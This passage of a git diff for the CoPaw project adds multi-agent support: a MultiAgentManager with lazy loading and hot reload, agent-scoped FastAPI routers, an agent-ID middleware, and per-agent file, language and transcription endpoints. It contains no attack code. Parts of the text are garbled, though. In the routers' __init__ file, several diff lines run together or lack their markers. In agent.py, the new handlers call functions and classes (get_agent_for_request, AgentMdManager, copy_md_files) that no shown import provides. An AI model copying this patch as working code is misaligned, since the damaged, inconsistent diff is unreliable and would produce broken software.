+        logger.debug("Created jobs.json for default agent")
+
+    # Only update config if agent didn't exist
+    if not agent_existed:
+        logger.info("Creating default agent...")
+
+        # Add default agent reference to config
+        config.agents.profiles["default"] = AgentProfileRef(
+            id="default",
+            workspace_dir=str(default_workspace),
+        )
+
+        # Set as active if no active agent
+        if not config.agents.active_agent:
+            config.agents.active_agent = "default"
+
+        save_config(config)
+        logger.info(
+            f"Created default agent with workspace: {default_workspace}",
+        )
diff --git a/src/copaw/app/multi_agent_manager.py b/src/copaw/app/multi_agent_manager.py
new file mode 100644
index 000000000..8b55d3f9b
--- /dev/null
+++ b/src/copaw/app/multi_agent_manager.py
@@ -0,0 +1,311 @@
+# -*- coding: utf-8 -*-
+"""MultiAgentManager: Manages multiple agent workspaces with lazy loading.
+
+Provides centralized management for multiple Workspace objects,
+including lazy loading, lifecycle management, and hot reloading.
+"""
+import asyncio
+import logging
+from typing import Dict
+
+from .workspace import Workspace
+from ..config.utils import load_config
+
+logger = logging.getLogger(__name__)
+
+
+class MultiAgentManager:
+    """Manages multiple agent workspaces.
+
+    Features:
+    - Lazy loading: Workspaces are created only when first requested
+    - Lifecycle management: Start, stop, reload workspaces
+    - Thread-safe: Uses async lock for concurrent access
+    - Hot reload: Reload individual workspaces without affecting others
+    """
+
+    def __init__(self):
+        """Initialize multi-agent manager."""
+        self.agents: Dict[str, Workspace] = {}
+        self._lock = asyncio.Lock()
+        logger.debug("MultiAgentManager initialized")
+
+    async def get_agent(self, agent_id: str) -> Workspace:
+        """Get agent workspace by ID (lazy loading).
+
+        If workspace doesn't exist in memory, it will be created and started.
+        Thread-safe using async lock.
+
+        Args:
+            agent_id: Agent ID to retrieve
+
+        Returns:
+            Workspace: The requested workspace instance
+
+        Raises:
+            ValueError: If agent ID not found in configuration
+        """
+        async with self._lock:
+            # Return existing agent if already loaded
+            if agent_id in self.agents:
+                logger.debug(f"Returning cached agent: {agent_id}")
+                return self.agents[agent_id]
+
+            # Load configuration to get agent reference
+            config = load_config()
+
+            if agent_id not in config.agents.profiles:
+                raise ValueError(
+                    f"Agent '{agent_id}' not found in configuration. "
+                    f"Available agents: {list(config.agents.profiles.keys())}",
+                )
+
+            agent_ref = config.agents.profiles[agent_id]
+
+            # Create and start new workspace
+            logger.info(f"Creating new workspace: {agent_id}")
+            instance = Workspace(
+                agent_id=agent_id,
+                workspace_dir=agent_ref.workspace_dir,
+            )
+
+            try:
+                await instance.start()
+                self.agents[agent_id] = instance
+                logger.info(f"Workspace created and started: {agent_id}")
+                return instance
+            except Exception as e:
+                logger.error(f"Failed to start workspace {agent_id}: {e}")
+                raise
+
+    async def stop_agent(self, agent_id: str) -> bool:
+        """Stop a specific agent instance.
+
+        Args:
+            agent_id: Agent ID to stop
+
+        Returns:
+            bool: True if agent was stopped, False if not running
+        """
+        async with self._lock:
+            if agent_id not in self.agents:
+                logger.warning(f"Agent not running: {agent_id}")
+                return False
+
+            instance = self.agents[agent_id]
+            await instance.stop()
+            del self.agents[agent_id]
+            logger.info(f"Agent stopped and removed: {agent_id}")
+            return True
+
+    async def reload_agent(self, agent_id: str) -> bool:
+        """Reload a specific agent instance with zero-downtime.
+
+        This method performs a seamless reload by:
+        1. Creating and fully starting a new workspace instance (no lock)
+        2. Atomically replacing the old instance with the new one (with lock)
+        3. Stopping the old instance after the new one is serving (no lock)
+
+        The lock is only held during the atomic swap to minimize blocking
+        time for other agent operations.
+
+        This ensures that:
+        - Ongoing chat requests continue using the old instance
+        - Other agents remain accessible during reload
+        - The manager stays responsive
+
+        Args:
+            agent_id: Agent ID to reload
+
+        Returns:
+            bool: True if agent was reloaded, False if not running
+        """
+        # Step 1: Check if agent exists (quick check with lock)
+        async with self._lock:
+            if agent_id not in self.agents:
+                logger.debug(
+                    f"Agent not running, will be loaded on next "
+                    f"request: {agent_id}",
+                )
+                return False
+            old_instance = self.agents[agent_id]
+
+        logger.info(f"Reloading agent (zero-downtime): {agent_id}")
+
+        # Step 2: Load configuration (outside lock)
+        config = load_config()
+        if agent_id not in config.agents.profiles:
+            logger.error(
+                f"Agent '{agent_id}' not found in configuration "
+                f"during reload",
+            )
+            return False
+
+        agent_ref = config.agents.profiles[agent_id]
+
+        # Step 3: Create and start new workspace instance (outside lock)
+        # This is the slow part, but doesn't block other agents
+        logger.info(f"Creating new workspace instance: {agent_id}")
+        new_instance = Workspace(
+            agent_id=agent_id,
+            workspace_dir=agent_ref.workspace_dir,
+        )
+
+        try:
+            await new_instance.start()
+            logger.info(f"New workspace instance started: {agent_id}")
+        except Exception as e:
+            logger.exception(
+                f"Failed to start new workspace instance for {agent_id}: {e}",
+            )
+            # Try to clean up the failed new instance
+            try:
+                await new_instance.stop()
+            except Exception:
+                pass  # Best effort cleanup
+            # Old instance is still running and serving requests
+            return False
+
+        # Step 4: Atomic swap (minimal lock time)
+        # From this point, reload is considered successful
+        async with self._lock:
+            # Double-check agent still exists
+            if agent_id not in self.agents:
+                logger.warning(
+                    f"Agent {agent_id} was removed during reload, "
+                    f"stopping new instance",
+                )
+                await new_instance.stop()
+                return False
+
+            # Swap instances atomically
+            old_instance = self.agents[agent_id]
+            self.agents[agent_id] = new_instance
+            logger.info(f"Workspace instance replaced: {agent_id}")
+
+        # Step 5: Stop old instance (outside lock)
+        # If this fails, new instance is already serving, so we still succeed
+        try:
+            await old_instance.stop()
+            logger.info(
+                f"Old workspace instance stopped: {agent_id}. "
+                f"Zero-downtime reload completed.",
+            )
+        except Exception as e:
+            logger.warning(
+                f"Failed to stop old workspace instance for {agent_id}: {e}. "
+                f"New instance is active and serving requests.",
+            )
+            # This is not a fatal error - new instance is already active
+
+        return True
+
+    async def stop_all(self):
+        """Stop all agent instances.
+
+        Called during application shutdown to clean up resources.
+        """
+        logger.info(f"Stopping all agents ({len(self.agents)} running)...")
+
+        # Create list of agent IDs to avoid modifying dict during iteration
+        agent_ids = list(self.agents.keys())
+
+        for agent_id in agent_ids:
+            try:
+                instance = self.agents[agent_id]
+                await instance.stop()
+                logger.debug(f"Agent stopped: {agent_id}")
+            except Exception as e:
+                logger.error(f"Error stopping agent {agent_id}: {e}")
+
+        self.agents.clear()
+        logger.info("All agents stopped")
+
+    def list_loaded_agents(self) -> list[str]:
+        """List currently loaded agent IDs.
+
+        Returns:
+            list[str]: List of loaded agent IDs
+        """
+        return list(self.agents.keys())
+
+    def is_agent_loaded(self, agent_id: str) -> bool:
+        """Check if agent is currently loaded.
+
+        Args:
+            agent_id: Agent ID to check
+
+        Returns:
+            bool: True if agent is loaded and running
+        """
+        return agent_id in self.agents
+
+    async def preload_agent(self, agent_id: str) -> bool:
+        """Preload an agent instance during startup.
+
+        Args:
+            agent_id: Agent ID to preload
+
+        Returns:
+            bool: True if successfully preloaded, False if failed
+        """
+        try:
+            await self.get_agent(agent_id)
+            logger.info(f"Successfully preloaded agent: {agent_id}")
+            return True
+        except Exception as e:
+            logger.error(f"Failed to preload agent {agent_id}: {e}")
+            return False
+
+    async def start_all_configured_agents(self) -> dict[str, bool]:
+        """Start all agents defined in configuration concurrently.
+
+        This method loads the current configuration and starts all
+        configured agents in parallel for optimal performance.
+
+        Returns:
+            dict[str, bool]: Mapping of agent_id to success status
+        """
+        config = load_config()
+        agent_ids = list(config.agents.profiles.keys())
+
+        if not agent_ids:
+            logger.warning("No agents configured in config")
+            return {}
+
+        logger.info(f"Starting {len(agent_ids)} configured agent(s)")
+
+        async def start_single_agent(agent_id: str) -> tuple[str, bool]:
+            """Start a single agent with error handling."""
+            try:
+                logger.info(f"Starting agent: {agent_id}")
+                await self.preload_agent(agent_id)
+                logger.info(f"Agent started successfully: {agent_id}")
+                return (agent_id, True)
+            except Exception as e:
+                logger.error(
+                    f"Failed to start agent {agent_id}: {e}. "
+                    f"Continuing with other agents...",
+                )
+                return (agent_id, False)
+
+        # Start all agents concurrently
+        results = await asyncio.gather(
+            *[start_single_agent(agent_id) for agent_id in agent_ids],
+            return_exceptions=False,
+        )
+
+        # Build result mapping
+        result_map = dict(results)
+        success_count = sum(1 for success in result_map.values() if success)
+        logger.info(
+            f"Agent startup complete: {success_count}/{len(agent_ids)} "
+            f"agents started successfully",
+        )
+
+        return result_map
+
+    def __repr__(self) -> str:
+        """String representation of manager."""
+        loaded = list(self.agents.keys())
+        return f"MultiAgentManager(loaded_agents={loaded})"
diff --git a/src/copaw/app/routers/__init__.py b/src/copaw/app/routers/__init__.py
index 3035b6481..0a25fae14 100644
--- a/src/copaw/app/routers/__init__.py
+++ b/src/copaw/app/routers/__init__.py
@@ -1,7 +1,9 @@
 # -*- coding: utf-8 -*-
+"""API routers."""
 from fastapi import APIRouter
 
 from .agent import router as agent_router
+from .agents import router as agents_router
 from .config import router as config_router
 from .local_models import router as local_models_router
 from .providers import router as providers_router
@@ -9,6 +11,7 @@
 from .skills_stream import router as skills_stream_router
 from .workspace import router as workspace_router
 from .envs import router as envs_router
+from .knowledge import router as knowledge_router
 from .ollama_models import router as ollama_models_router
 from .mcp import router as mcp_router
 from .tools import router as tools_router
@@ -16,10 +19,11 @@
 from ..runner.api import router as runner_router
 from .console import router as console_router
 from .token_usage import router as token_usage_router
-
+from .auth import router as auth_router
 
 router = APIRouter()
 
+router.include_router(agents_router)
router.include_router(agent_router)
 router.include_router(config_router)
 router.include_router(console_router)
@@ -34,6 +38,20 @@
 router.include_router(tools_router)
router.include_router(workspace_router) router.include_router(envs_router) +router.include_router(knowledge_router) router.include_router(token_usage_router) +router.include_router(auth_router) + + +def create_agent_scoped_router() -> APIRouter: + """Create agent-scoped router that wraps existing routers. + + Returns: + APIRouter with all routers mounted under /agents/{agentId}/ + """ + from .agent_scoped import create_agent_scoped_router as _create + + return _create() + -__all__ = ["router"] +__all__ = ["router", "create_agent_scoped_router"] diff --git a/src/copaw/app/routers/agent.py b/src/copaw/app/routers/agent.py index 2afc9997b..fecbc7dc2 100644 --- a/src/copaw/app/routers/agent.py +++ b/src/copaw/app/routers/agent.py @@ -1,7 +1,10 @@ # -*- coding: utf-8 -*- """Agent file management API.""" -from fastapi import APIRouter, Body, HTTPException +import asyncio +import logging + +from fastapi import APIRouter, Body, HTTPException, Request from pydantic import BaseModel, Field from ...config import ( @@ -9,12 +12,83 @@ save_config, AgentsRunningConfig, ) +from ...knowledge.module_skills import sync_knowledge_module_skills from ...agents.memory.agent_md_manager import AGENT_MD_MANAGER router = APIRouter(prefix="/agent", tags=["agent"]) +def _migrate_knowledge_automation_to_running(config) -> bool: + """Compat: migrate deprecated knowledge.automation to agents.running.""" + changed = False + defaults = AgentsRunningConfig() + running = config.agents.running + legacy = getattr(config.knowledge, "automation", None) + if legacy is None: + return False + + if ( + running.knowledge_enabled == defaults.knowledge_enabled + and config.knowledge.enabled != defaults.knowledge_enabled + ): + running.knowledge_enabled = config.knowledge.enabled + changed = True + + if ( + running.knowledge_auto_collect_chat_files == defaults.knowledge_auto_collect_chat_files + and legacy.knowledge_auto_collect_chat_files != defaults.knowledge_auto_collect_chat_files + ): + 
running.knowledge_auto_collect_chat_files = legacy.knowledge_auto_collect_chat_files
+        changed = True
+
+    if (
+        running.knowledge_auto_collect_chat_urls == defaults.knowledge_auto_collect_chat_urls
+        and legacy.knowledge_auto_collect_chat_urls != defaults.knowledge_auto_collect_chat_urls
+    ):
+        running.knowledge_auto_collect_chat_urls = legacy.knowledge_auto_collect_chat_urls
+        changed = True
+
+    if (
+        running.knowledge_auto_collect_long_text == defaults.knowledge_auto_collect_long_text
+        and legacy.knowledge_auto_collect_long_text != defaults.knowledge_auto_collect_long_text
+    ):
+        running.knowledge_auto_collect_long_text = legacy.knowledge_auto_collect_long_text
+        changed = True
+
+    if (
+        running.knowledge_long_text_min_chars == defaults.knowledge_long_text_min_chars
+        and legacy.knowledge_long_text_min_chars != defaults.knowledge_long_text_min_chars
+    ):
+        running.knowledge_long_text_min_chars = legacy.knowledge_long_text_min_chars
+        changed = True
+
+    knowledge_index = getattr(config.knowledge, "index", None)
+    if (
+        knowledge_index is not None
+        and running.knowledge_chunk_size == defaults.knowledge_chunk_size
+        and knowledge_index.chunk_size != defaults.knowledge_chunk_size
+    ):
+        running.knowledge_chunk_size = knowledge_index.chunk_size
+        changed = True
+
+    return changed
+
+
+def _sync_running_to_knowledge_automation(config) -> None:
+    """Compat: keep deprecated knowledge.automation in sync."""
+    legacy = getattr(config.knowledge, "automation", None)
+    if legacy is None:
+        return
+    running = config.agents.running
+    config.knowledge.enabled = running.knowledge_enabled
+    legacy.knowledge_auto_collect_chat_files = running.knowledge_auto_collect_chat_files
+    legacy.knowledge_auto_collect_chat_urls = running.knowledge_auto_collect_chat_urls
+    legacy.knowledge_auto_collect_long_text = running.knowledge_auto_collect_long_text
+    legacy.knowledge_long_text_min_chars = running.knowledge_long_text_min_chars
+    # Guard against configs without knowledge.index, mirroring the
+    # getattr guard used in the migration helper above.
+    knowledge_index = getattr(config.knowledge, "index", None)
+    if knowledge_index is not None:
+        knowledge_index.chunk_size = 
running.knowledge_chunk_size + + class MdFileInfo(BaseModel): """Markdown file metadata.""" @@ -35,14 +109,20 @@ class MdFileContent(BaseModel): "/files", response_model=list[MdFileInfo], summary="List working files", - description="List all working files", + description="List all working files (uses active agent)", ) -async def list_working_files() -> list[MdFileInfo]: +async def list_working_files( + request: Request, +) -> list[MdFileInfo]: """List working directory markdown files.""" try: + workspace = await get_agent_for_request(request) + workspace_manager = AgentMdManager( + str(workspace.workspace_dir), + ) files = [ MdFileInfo.model_validate(file) - for file in AGENT_MD_MANAGER.list_working_mds() + for file in workspace_manager.list_working_mds() ] return files except Exception as exc: @@ -53,14 +133,19 @@ async def list_working_files() -> list[MdFileInfo]: "/files/{md_name}", response_model=MdFileContent, summary="Read a working file", - description="Read a working markdown file", + description="Read a working markdown file (uses active agent)", ) async def read_working_file( md_name: str, + request: Request, ) -> MdFileContent: """Read a working directory markdown file.""" try: - content = AGENT_MD_MANAGER.read_working_md(md_name) + workspace = await get_agent_for_request(request) + workspace_manager = AgentMdManager( + str(workspace.workspace_dir), + ) + content = workspace_manager.read_working_md(md_name) return MdFileContent(content=content) except FileNotFoundError as exc: raise HTTPException(status_code=404, detail=str(exc)) from exc @@ -72,15 +157,20 @@ async def read_working_file( "/files/{md_name}", response_model=dict, summary="Write a working file", - description="Create or update a working file", + description="Create or update a working file (uses active agent)", ) async def write_working_file( md_name: str, - request: MdFileContent, + body: MdFileContent, + request: Request, ) -> dict: """Write a working directory markdown file.""" try: - 
AGENT_MD_MANAGER.write_working_md(md_name, request.content) + workspace = await get_agent_for_request(request) + workspace_manager = AgentMdManager( + str(workspace.workspace_dir), + ) + workspace_manager.write_working_md(md_name, body.content) return {"written": True} except Exception as exc: raise HTTPException(status_code=500, detail=str(exc)) from exc @@ -90,14 +180,20 @@ async def write_working_file( "/memory", response_model=list[MdFileInfo], summary="List memory files", - description="List all memory files", + description="List all memory files (uses active agent)", ) -async def list_memory_files() -> list[MdFileInfo]: +async def list_memory_files( + request: Request, +) -> list[MdFileInfo]: """List memory directory markdown files.""" try: + workspace = await get_agent_for_request(request) + workspace_manager = AgentMdManager( + str(workspace.workspace_dir), + ) files = [ MdFileInfo.model_validate(file) - for file in AGENT_MD_MANAGER.list_memory_mds() + for file in workspace_manager.list_memory_mds() ] return files except Exception as exc: @@ -108,14 +204,19 @@ async def list_memory_files() -> list[MdFileInfo]: "/memory/{md_name}", response_model=MdFileContent, summary="Read a memory file", - description="Read a memory markdown file", + description="Read a memory markdown file (uses active agent)", ) async def read_memory_file( md_name: str, + request: Request, ) -> MdFileContent: """Read a memory directory markdown file.""" try: - content = AGENT_MD_MANAGER.read_memory_md(md_name) + workspace = await get_agent_for_request(request) + workspace_manager = AgentMdManager( + str(workspace.workspace_dir), + ) + content = workspace_manager.read_memory_md(md_name) return MdFileContent(content=content) except FileNotFoundError as exc: raise HTTPException(status_code=404, detail=str(exc)) from exc @@ -127,15 +228,20 @@ async def read_memory_file( "/memory/{md_name}", response_model=dict, summary="Write a memory file", - description="Create or update a memory file", + 
description="Create or update a memory file (uses active agent)", ) async def write_memory_file( md_name: str, - request: MdFileContent, + body: MdFileContent, + request: Request, ) -> dict: """Write a memory directory markdown file.""" try: - AGENT_MD_MANAGER.write_memory_md(md_name, request.content) + workspace = await get_agent_for_request(request) + workspace_manager = AgentMdManager( + str(workspace.workspace_dir), + ) + workspace_manager.write_memory_md(md_name, body.content) return {"written": True} except Exception as exc: raise HTTPException(status_code=500, detail=str(exc)) from exc @@ -146,10 +252,14 @@ async def write_memory_file( summary="Get agent language", description="Get the language setting for agent MD files (en/zh/ru)", ) -async def get_agent_language() -> dict: - """Get agent language setting.""" - config = load_config() - return {"language": config.agents.language} +async def get_agent_language(request: Request) -> dict: + """Get agent language setting for current agent.""" + workspace = await get_agent_for_request(request) + agent_config = load_agent_config(workspace.agent_id) + return { + "language": agent_config.language, + "agent_id": workspace.agent_id, + } @router.put( @@ -157,16 +267,19 @@ async def get_agent_language() -> dict: summary="Update agent language", description=( "Update the language for agent MD files (en/zh/ru). " - "Optionally copies MD files for the new language." + "Optionally copies MD files for the new language to agent workspace." ), ) async def put_agent_language( + request: Request, body: dict = Body( ..., description='Language setting, e.g. {"language": "zh"}', ), ) -> dict: - """Update agent language and optionally re-copy MD files.""" + """ + Update agent language and optionally re-copy MD files to agent workspace. 
+ """ language = (body.get("language") or "").strip().lower() valid = {"zh", "en", "ru"} if language not in valid: @@ -177,36 +290,216 @@ async def put_agent_language( f"Must be one of: {', '.join(sorted(valid))}" ), ) - config = load_config() - old_language = config.agents.language - config.agents.language = language - save_config(config) + + # Get current agent's workspace + workspace = await get_agent_for_request(request) + agent_id = workspace.agent_id + + # Load agent config + agent_config = load_agent_config(agent_id) + old_language = agent_config.language + + # Update agent's language + agent_config.language = language + save_agent_config(agent_id, agent_config) copied_files: list[str] = [] if old_language != language: - from ...agents.utils import copy_md_files - - copied_files = copy_md_files(language) or [] - if copied_files: - config = load_config() - config.agents.installed_md_files_language = language - save_config(config) + # Copy MD files to agent's workspace directory + copied_files = ( + copy_md_files( + language, + workspace_dir=workspace.workspace_dir, + ) + or [] + ) return { "language": language, "copied_files": copied_files, + "agent_id": agent_id, } +@router.get( + "/audio-mode", + summary="Get audio mode", + description=( + "Get the audio handling mode for incoming voice messages. " + 'Values: "auto", "native".' + ), +) +async def get_audio_mode() -> dict: + """Get audio mode setting.""" + config = load_config() + return {"audio_mode": config.agents.audio_mode} + + +@router.put( + "/audio-mode", + summary="Update audio mode", + description=( + "Update how incoming audio/voice messages are handled. " + '"auto": transcribe if provider available, else file placeholder; ' + '"native": send audio directly to model (may need ffmpeg).' + ), +) +async def put_audio_mode( + body: dict = Body( + ..., + description='Audio mode, e.g. 
{"audio_mode": "auto"}', + ), +) -> dict: + """Update audio mode setting.""" + raw = body.get("audio_mode") + audio_mode = (str(raw) if raw is not None else "").strip().lower() + valid = {"auto", "native"} + if audio_mode not in valid: + raise HTTPException( + status_code=400, + detail=( + f"Invalid audio_mode '{audio_mode}'. " + f"Must be one of: {', '.join(sorted(valid))}" + ), + ) + config = load_config() + config.agents.audio_mode = audio_mode + save_config(config) + return {"audio_mode": audio_mode} + + +@router.get( + "/transcription-provider-type", + summary="Get transcription provider type", + description=( + "Get the transcription provider type. " + 'Values: "disabled", "whisper_api", "local_whisper".' + ), +) +async def get_transcription_provider_type() -> dict: + """Get transcription provider type setting.""" + config = load_config() + return { + "transcription_provider_type": ( + config.agents.transcription_provider_type + ), + } + + +@router.put( + "/transcription-provider-type", + summary="Set transcription provider type", + description=( + "Set the transcription provider type. " + '"disabled": no transcription; ' + '"whisper_api": remote Whisper endpoint; ' + '"local_whisper": locally installed openai-whisper.' + ), +) +async def put_transcription_provider_type( + body: dict = Body( + ..., + description=( + "Provider type, e.g. " + '{"transcription_provider_type": "whisper_api"}' + ), + ), +) -> dict: + """Set the transcription provider type.""" + raw = body.get("transcription_provider_type") + provider_type = (str(raw) if raw is not None else "").strip().lower() + valid = {"disabled", "whisper_api", "local_whisper"} + if provider_type not in valid: + raise HTTPException( + status_code=400, + detail=( + f"Invalid transcription_provider_type '{provider_type}'. 
" + f"Must be one of: {', '.join(sorted(valid))}" + ), + ) + config = load_config() + config.agents.transcription_provider_type = provider_type + save_config(config) + return {"transcription_provider_type": provider_type} + + +@router.get( + "/local-whisper-status", + summary="Check local whisper availability", + description=( + "Check whether the local whisper provider can be used. " + "Returns availability of ffmpeg and openai-whisper." + ), +) +async def get_local_whisper_status() -> dict: + """Check local whisper dependencies.""" + from ...agents.utils.audio_transcription import ( + check_local_whisper_available, + ) + + return check_local_whisper_available() + + +@router.get( + "/transcription-providers", + summary="List transcription providers", + description=( + "List providers capable of audio transcription (Whisper API). " + "Returns available providers and the configured selection." + ), +) +async def get_transcription_providers() -> dict: + """List transcription-capable providers and configured selection.""" + from ...agents.utils.audio_transcription import ( + get_configured_transcription_provider_id, + list_transcription_providers, + ) + + return { + "providers": list_transcription_providers(), + "configured_provider_id": (get_configured_transcription_provider_id()), + } + + +@router.put( + "/transcription-provider", + summary="Set transcription provider", + description=( + "Set the provider to use for audio transcription. " + 'Use empty string "" to unset.' + ), +) +async def put_transcription_provider( + body: dict = Body( + ..., + description=( + 'Provider ID, e.g. 
{"provider_id": "openai"} ' + 'or {"provider_id": ""} to unset' + ), + ), +) -> dict: + """Set the transcription provider.""" + provider_id = (body.get("provider_id") or "").strip() + config = load_config() + config.agents.transcription_provider_id = provider_id + save_config(config) + return {"provider_id": provider_id} + + @router.get( "/running-config", response_model=AgentsRunningConfig, summary="Get agent running config", - description="Retrieve agent runtime behavior configuration", + description="Get running configuration for active agent", ) -async def get_agents_running_config() -> AgentsRunningConfig: +async def get_agents_running_config( + request: Request, +) -> AgentsRunningConfig: """Get agent running configuration.""" config = load_config() + if _migrate_knowledge_automation_to_running(config): + _sync_running_to_knowledge_automation(config) + save_config(config) return config.agents.running @@ -214,17 +507,22 @@ async def get_agents_running_config() -> AgentsRunningConfig: "/running-config", response_model=AgentsRunningConfig, summary="Update agent running config", - description="Update agent runtime behavior configuration", + description="Update running configuration for active agent", ) async def put_agents_running_config( running_config: AgentsRunningConfig = Body( ..., description="Updated agent running configuration", ), + request: Request = None, ) -> AgentsRunningConfig: """Update agent running configuration.""" config = load_config() + previous_enabled = bool(getattr(config.agents.running, "knowledge_enabled", True)) config.agents.running = running_config + _sync_running_to_knowledge_automation(config) + if previous_enabled != running_config.knowledge_enabled: + sync_knowledge_module_skills(running_config.knowledge_enabled) save_config(config) return running_config @@ -233,28 +531,50 @@ async def put_agents_running_config( "/system-prompt-files", response_model=list[str], summary="Get system prompt files", - description="Get list of markdown 
files enabled for system prompt", + description="Get system prompt files for active agent", ) -async def get_system_prompt_files() -> list[str]: +async def get_system_prompt_files( + request: Request, +) -> list[str]: """Get list of enabled system prompt files.""" - config = load_config() - return config.agents.system_prompt_files + workspace = await get_agent_for_request(request) + agent_config = load_agent_config(workspace.agent_id) + return agent_config.system_prompt_files or [] @router.put( "/system-prompt-files", response_model=list[str], summary="Update system prompt files", - description="Update list of markdown files enabled for system prompt", + description="Update system prompt files for active agent", ) async def put_system_prompt_files( files: list[str] = Body( ..., - description="List of markdown filenames to load into system prompt", + description="Markdown filenames to load into system prompt", ), + request: Request = None, ) -> list[str]: """Update list of enabled system prompt files.""" - config = load_config() - config.agents.system_prompt_files = files - save_config(config) + workspace = await get_agent_for_request(request) + agent_config = load_agent_config(workspace.agent_id) + agent_config.system_prompt_files = files + save_agent_config(workspace.agent_id, agent_config) + + # Hot reload config (async, non-blocking) + # IMPORTANT: Get manager before creating background task to avoid + # accessing request object after its lifecycle ends + manager = request.app.state.multi_agent_manager + agent_id = workspace.agent_id + + async def reload_in_background(): + try: + await manager.reload_agent(agent_id) + except Exception as e: + logging.getLogger(__name__).warning( + f"Background reload failed: {e}", + ) + + asyncio.create_task(reload_in_background()) + return files diff --git a/src/copaw/app/routers/agent_scoped.py b/src/copaw/app/routers/agent_scoped.py new file mode 100644 index 000000000..f0437adb8 --- /dev/null +++ 
b/src/copaw/app/routers/agent_scoped.py
@@ -0,0 +1,91 @@
+# -*- coding: utf-8 -*-
+"""Agent-scoped router that wraps existing routers under /agents/{agentId}/.
+
+This provides agent isolation by injecting agentId into request.state,
+allowing downstream APIs to access the correct agent context.
+"""
+from fastapi import APIRouter, Request
+from starlette.middleware.base import (
+    BaseHTTPMiddleware,
+    RequestResponseEndpoint,
+)
+from starlette.responses import Response
+
+
+class AgentContextMiddleware(BaseHTTPMiddleware):
+    """Middleware to inject agentId into request.state."""
+
+    async def dispatch(
+        self,
+        request: Request,
+        call_next: RequestResponseEndpoint,
+    ) -> Response:
+        """Extract agentId from path/header and inject into context."""
+        import logging
+        from ..agent_context import set_current_agent_id
+
+        logger = logging.getLogger(__name__)
+        agent_id = None
+
+        # Priority 1: extract agentId from path: /api/agents/{agentId}/...
+        path_parts = request.url.path.split("/")
+        if len(path_parts) >= 4 and path_parts[1] == "api":
+            if path_parts[2] == "agents":
+                agent_id = path_parts[3]
+                logger.debug(
+                    f"AgentContextMiddleware: agent_id={agent_id} "
+                    f"from path={request.url.path}",
+                )
+
+        # Priority 2: fall back to the X-Agent-Id header
+        if not agent_id:
+            agent_id = request.headers.get("X-Agent-Id")
+
+        # Expose agent_id on request.state and in the context variable
+        # regardless of which source supplied it, so header-based
+        # requests get the same downstream context as path-based ones.
+        if agent_id:
+            request.state.agent_id = agent_id
+            set_current_agent_id(agent_id)
+
+        response = await call_next(request)
+        return response
+
+
+def create_agent_scoped_router() -> APIRouter:
+    """Create router that wraps all existing routers under /{agentId}/.
+
+    Returns:
+        APIRouter with all sub-routers mounted under /{agentId}/
+    """
+    from .agent import router as agent_router
+    from .skills import router as skills_router
+    from .tools import router as tools_router
+    from .config import router as config_router
+    from .mcp import router as mcp_router
+    from .workspace import router as workspace_router
+ from ..crons.api import router as cron_router + from ..runner.api import router as chats_router + from .console import router as console_router + + # Create parent router with agentId parameter + router = APIRouter(prefix="/agents/{agentId}", tags=["agent-scoped"]) + + # Include all agent-specific sub-routers (they keep their own prefixes) + # /agents/{agentId}/agent/* -> agent_router + # /agents/{agentId}/chats/* -> chats_router + # /agents/{agentId}/config/* -> config_router (channels, heartbeat) + # /agents/{agentId}/cron/* -> cron_router + # /agents/{agentId}/mcp/* -> mcp_router + # /agents/{agentId}/skills/* -> skills_router + # /agents/{agentId}/tools/* -> tools_router + # /agents/{agentId}/workspace/* -> workspace_router + router.include_router(agent_router) + router.include_router(chats_router) + router.include_router(config_router) + router.include_router(cron_router) + router.include_router(mcp_router) + router.include_router(skills_router) + router.include_router(tools_router) + router.include_router(workspace_router) + router.include_router(console_router) + + return router diff --git a/src/copaw/app/routers/agents.py b/src/copaw/app/routers/agents.py new file mode 100644 index 000000000..38963febe --- /dev/null +++ b/src/copaw/app/routers/agents.py @@ -0,0 +1,526 @@ +# -*- coding: utf-8 -*- +"""Multi-agent management API. + +Provides RESTful API for managing multiple agent instances. 
+""" +import asyncio +import json +import logging +from pathlib import Path +from fastapi import APIRouter, Body, HTTPException, Request +from fastapi import Path as PathParam +from pydantic import BaseModel + +from ...config.config import ( + AgentProfileConfig, + AgentProfileRef, + load_agent_config, + save_agent_config, + generate_short_agent_id, +) +from ...config.utils import load_config, save_config +from ...agents.memory.agent_md_manager import AgentMdManager +from ..multi_agent_manager import MultiAgentManager +from ...constant import WORKING_DIR + +logger = logging.getLogger(__name__) + +router = APIRouter(prefix="/agents", tags=["agents"]) + + +class AgentSummary(BaseModel): + """Agent summary information.""" + + id: str + name: str + description: str + workspace_dir: str + + +class AgentListResponse(BaseModel): + """Response for listing agents.""" + + agents: list[AgentSummary] + + +class CreateAgentRequest(BaseModel): + """Request model for creating a new agent (id is auto-generated).""" + + name: str + description: str = "" + workspace_dir: str | None = None + language: str = "en" + + +class MdFileInfo(BaseModel): + """Markdown file metadata.""" + + filename: str + path: str + size: int + created_time: str + modified_time: str + + +class MdFileContent(BaseModel): + """Markdown file content.""" + + content: str + + +def _get_multi_agent_manager(request: Request) -> MultiAgentManager: + """Get MultiAgentManager from app state.""" + if not hasattr(request.app.state, "multi_agent_manager"): + raise HTTPException( + status_code=500, + detail="MultiAgentManager not initialized", + ) + return request.app.state.multi_agent_manager + + +@router.get( + "", + response_model=AgentListResponse, + summary="List all agents", + description="Get list of all configured agents", +) +async def list_agents() -> AgentListResponse: + """List all configured agents.""" + config = load_config() + + agents = [] + for agent_id, agent_ref in config.agents.profiles.items(): + # 
Load agent config to get name and description
+        try:
+            agent_config = load_agent_config(agent_id)
+            agents.append(
+                AgentSummary(
+                    id=agent_id,
+                    name=agent_config.name,
+                    description=agent_config.description,
+                    workspace_dir=agent_ref.workspace_dir,
+                ),
+            )
+        except Exception:
+            # If agent config load fails, fall back to basic info
+            agents.append(
+                AgentSummary(
+                    id=agent_id,
+                    name=agent_id.title(),
+                    description="",
+                    workspace_dir=agent_ref.workspace_dir,
+                ),
+            )
+
+    return AgentListResponse(
+        agents=agents,
+    )
+
+
+@router.get(
+    "/{agentId}",
+    response_model=AgentProfileConfig,
+    summary="Get agent details",
+    description="Get complete configuration for a specific agent",
+)
+async def get_agent(agentId: str = PathParam(...)) -> AgentProfileConfig:
+    """Get agent configuration."""
+    try:
+        agent_config = load_agent_config(agentId)
+        return agent_config
+    except ValueError as e:
+        raise HTTPException(status_code=404, detail=str(e)) from e
+    except Exception as e:
+        raise HTTPException(status_code=500, detail=str(e)) from e
+
+
+@router.post(
+    "",
+    response_model=AgentProfileRef,
+    status_code=201,
+    summary="Create new agent",
+    description="Create a new agent (ID is auto-generated by server)",
+)
+async def create_agent(
+    request: CreateAgentRequest = Body(...),
+) -> AgentProfileRef:
